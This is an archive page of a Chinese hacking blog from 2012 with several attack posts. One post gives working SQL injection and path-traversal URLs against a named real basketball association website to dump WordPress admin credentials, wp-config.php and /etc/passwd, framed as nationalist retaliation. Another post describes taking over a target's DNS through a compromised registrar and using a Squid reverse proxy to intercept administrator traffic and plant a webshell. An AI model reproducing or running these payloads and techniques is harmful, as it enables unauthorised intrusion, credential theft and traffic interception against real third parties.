存档

‘本站原创’ 分类的存档

日本入侵中国篮协网站,其日本篮协网站同样存在漏洞

2012年11月8日 7 条评论

    前因:

    2012年11月7日,中国篮协官网主页上部背景被改成黑色,并出现了包含“钓鱼岛”和部分侮辱性言辞的日文词句。网页中间还出现了日美两国的国旗。

    看到这个微博后,就想看看日本篮协网站的安全性到底如何?

    日本篮协网站(www.japanbasketball.jp)功能比较简单使用了开源系统WordPress,WordPress总体上安全性较高,出现漏洞一般情况也是在插件上,所以本以为日本篮协网站的安全性应该很高,但在网站上随意点了几下后,让我大为惊叹,漫山遍野注入漏洞……

1 、SQL注入

    注入漏洞较多,随便点点都可以发现,选择了一个支持union的点,可以直接暴出WordPress管理员用户名和密码,代码如下:

    http://www.japanbasketball.jp//wintercup/2012/team_detail.php?team_id=100454&event_id=118/**/and/**/1=5/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat%280×232323,user_login,0x2d2d2d,user_pass,0x2d2d2d,0×232323%29,16,17,18,19,20,
21,22%20from%20wp_users

2、任意文件查看漏洞

    漏洞地址:https://www.japanbasketball.jp/alljapan/2011/image_display.php?p=image_display.php


<?
$image_path =$_GET['p'];

if (file_exists($image_path)) {
header('Content-Type: image/jpeg');
readfile($image_path);
}

?>

    $image_path未经过任何限制,直接使用readfile调用,导致漏洞产生。

    查看网站源码:

    https://www.japanbasketball.jp/alljapan/2011/image_display.php?p=../../wp-config.php

    查看/etc/passwd:

    https://www.japanbasketball.jp/alljapan/2011/image_display.php?p=../../../../../../../../../../etc/passwd

    有了这二个漏洞,继续渗透的思路就很开阔了,就是时间的问题了,比跨库查询、通过注入获取所有表内容、查看网站数据库配置文件、获取服务器中apache、ftp等配置文件、有时间和兴趣的同学可以练练手。

    只想对告诉日本,在入侵我们篮协的同时,其实你们自己篮协的网站同样不安全。本文没有任何技术含量,如果日本篮协网站被篡改,与007安全无关!

在线检测电脑是否存在Java漏洞

2012年9月4日 6 条评论

作者:不走的钟

来源:http://www.007hack.com/?p=805

一个新型的JAVA高危漏洞已被国外黑客网站公开,影响包括微软Windows和苹果Mac OS在内的所有操作系统。一旦装有JAVA组件(JDK/JRE)的浏览器访问恶意网页,木马将在用户毫无察觉间植入电脑,此挂马漏洞正在飞速传播,请广大网友注意。
本站提供在线漏洞检测电脑是否存在此漏洞,访问网页即可检测该电脑是否存在漏洞

提示:本页面会执行Java漏洞的exp,演示打开计算器,有的杀病毒软件可能会提示存在病毒,说明你的杀病毒软件已经可以拦截该漏洞了。
url:http://www.007hack.com/tool/java_exp_test.html
不存在漏洞,如下图:

存在漏洞,并自动打开计算器,如下图:

反向代理在Web渗透测试中的运用

2012年6月6日 16 条评论

作者:不走的钟

来源:http://www.007hack.com/?p=770

  在一次Web渗透测试中,目标是M国的一个Win+Apache+PHP+MYSQL的网站,独立服务器,对外仅开80端口,网站前端的业务系统比较简单,经过几天的测试也没有找到漏洞,甚至连XSS都没有发现,也未找到网站后台,在收集信息的时候已经排除了C段入侵的可行性(选择C段入侵的时候,需要对目标、网络、路由和国家区域进行分析和判断,如果不经思考和判断地去入侵C段服务器,当你费尽心思拿到某台服务器权限时,往往发现毫无半点用处,特别又是在国外,ARP基本上都没什么希望,当然内网渗透中又是另一回事。)

  也许在渗透测试遇到这种情况时大多会选择放弃,在绝望的时候,我将目标临时转移到该网站域名注册商,因为拥有域名注册商网站权限,至少可以修改目标网站的域名解析。一般情况入侵域名注册网站难度比较大,但并不是没有希望,在09年的时候,国内很多域名注册商的网站都存在漏洞。渗透那个域名注册商网站,过程比较繁杂,也没有新的技术点,靠的就是细心和耐心,但最终还是获取到目标网站域名的管理账号和密码,那么此时我们已知和已有的条件如下:

  目标域名:www.007hack.com(当然不是真的,文章来源007安全)
  网站IP:1.1.1.1

  环境:Win+Apache+PHP+MYSQL

  已有权限:域名解析权限,可以将www.007hack.com解析到任何一个IP上

  特别说明下,目标网站使用的服务器,并不是在域名注册商租用的,而是放置在公司机房中,所以通过域名注册商网站,是不能管理到Web源码的,只能进行域名解析。

  当拥有域名解析权限后,如何才获取目标网站的权限呢?

  A:构造一个和目标非常相似的网站?然后将域名解析到构造的网站?

  B:使用iis重定向?

这些方法都非常容易被发现,并且也无法获取到权限,所以遇到这种场景的时候我们可以使用反向代理,也是本文的重点。了解反向代理之前,我做一个关于HTTP 代理的简单介绍, 代理常用的是普通代理和反向代理:

普通代理:为用户(客户端)提供代理,需要在客户端设置,比如在客户端浏览器中设置代理服务器IP和端口,完成配置后,用户可以通过代理服务器访问互联网,代理服务器相当于中间人的作用。根据代理服务器配置不同,又可以将普通代理分为,几种不同安全级别的代理,代理软件比较多,不同的厂商有不同的称谓和分级,一般情况都包括以下三个级别,透明代理、普通匿名代理和高匿名代理。

透明代理:

REMOTE_ADDR = 代理服务器 IP
HTTP_VIA = 代理服务器 IP
HTTP_X_FORWARDED_FOR = 真实 IP

说明:使用透明代理,可以进行信息交互,但不能隐藏自己真实IP,安全性越差,所以黑客一般不会使用此类代理。

普通匿名代理:

REMOTE_ADDR = 代理服务器 IP
HTTP_VIA = 代理服务器 IP
HTTP_X_FORWARDED_FOR = 代理服务器 IP

说明:隐藏了真实的IP,但通过HTTP_VIA可以判断出你使用了代理。

高匿名代理:

REMOTE_ADDR = 代理服务器 IP
HTTP_VIA = 没数值

HTTP_X_FORWARDED_FOR = 没数值

说明:可以隐藏真实IP,同时不会泄露你是否使用了代理,这类代理黑客往往比较喜欢。

用户通过普通代理访问Web,实际上用户并没有直接访问Web服务器,而是通过代理服务器作为中转,的示意图如下:

反向代理:是为服务器提供代理和缓存,不需要在客户端。用户访问网站,实际上并不是直接访问Web服务器,而是首先访问反向代理服务器,如果请求的是html/htm/gif/jpg等这些静态文件时,反向代理服务器直接返回结果,如果用户请求是脚本如asp/php/jsp等内容时,反向代理服务器会将请求转发给Web服务器处理,再把结果返回给用户,从而通过缓存实现加速的效果。示意图如下:

  Squid和Nginx是非常优秀的反向代理软件,本文主要介绍Squid,它支持Windows和Linux,由于目标网站环境是win,我这里使用Win下的squid(使用Linux也可以),配置方法如下:

Squid版本:2.7 For Win

1、配置squid/etc目录
cachemgr.conf.default
mime.conf.default
squid.conf.default
squid_radius_auth.conf.default(可能低版本这个文件不存在,如果没有就不用修改)

复制并改名为:

cachemgr.conf
mime.conf
squid.conf
squid_radius_auth.conf

2.用文本编辑器打开squid.conf,需要修改的地方:

查找http_port 3128在后面增加一行
http_port 80 vhost

查找#cache_peer sib2.foo.net sibling 3128 3130 [proxy-only]在后面增加一行
cache_peer 1.1.1.1         parent    80      0   no-query   originserver

1.1.1.1为目标网站真实IP,80为端口

查找# TAG: visible_hostname在后面增加一行

visible_hostname volcano(任意命名)

查找http_access deny all 在其前面加#将这一行注释掉,然后增加一行

http_access allow all

3.使用squid/sbin/squid.exe执行以下命令

squid -i -n web_squid  #命名squid服务的新名称
squid -i  #将squid服务加入到服务里面
squid -r -n web_squid  #删除指定名称的服务
squid -z  #创建缓存目录
squid -k parse  #检测配置是否有效
net start web_squid #启动
squid -dx #当服务不能启动时,进行调试

  测试squid是否正常:
  访问http://squid服务器ip
  实际指向http://web服务器IP

  完成测试后,将目标域名解析到squid服务器IP,网站以及功能完全正常,唯一差别就是ping返回的IP是squid服务器的IP,并不是真正的Web服务器IP,只要网站正常访问,管理员也不会时时去ping。

  经过几个小时等待后,目标网站管理员登陆后台,在日志squid\var\logs\access.log就可以找到后台地址,后台目录文件名非常地长,同时收获了很多敏感的URL,准备研究如何截取Cookie或者后台账号密码时,后台xx_adduser.php存在本地验证漏洞,直接添加管理员成功,管理员和后台地址都有了,登陆后顺利拿到WebShell。

  当然,如果后台不存在这个漏洞,应该还是有办法可以弄到权限的,毕竟用户/管理员访问的数据包都会经过这台squid服务器,只不过会麻烦许多……

PJBlog 3.2.9.518 getwebshell 漏洞

2012年5月9日 4 条评论

作者:不走的钟

版本:PJblog 3.2.9.518(2012/5/9日时为最新版本)

漏洞利用条件:

1、使用全静态模式(默认情况是全静态模式)

2、用户可以发帖(默认普通用户不能发帖,所以有点鸡肋)

漏洞描述:PJblog 3.2.9.518使用js过滤特殊字符,在使用全静态模式下,普通用户发帖即可插入asp一句话木马。

阅读全文…

注入漏洞利用工具模板 For PHP

2012年3月13日 3 条评论

作者:不走的钟
 
 今天有朋友在blog上问,这种漏洞存在,但究竟如何利用?(见原文)因为你提交字符后会跳转到index.php,这种注入,手入是没办法的,需要借用第三方工具或者自己写,我翻了下硬盘,N久以前写过类似的代码,扔出来大家可以参考,大家可以在这个基础上稍做修改便可使用:

阅读全文…

PHP 代码安全审计——程序员容易忽略的安全问题-注入篇

2012年2月20日 9 条评论
作者:不走的钟
        程序员主要考虑功能设计,但往往忽略了程序的安全性,最近在项目中审计PHP代码时,遇到二个简单而很多程序员都容易忽略的问题,安全问题不容小视,往往微小问题便可导致全站覆没,看下边代码: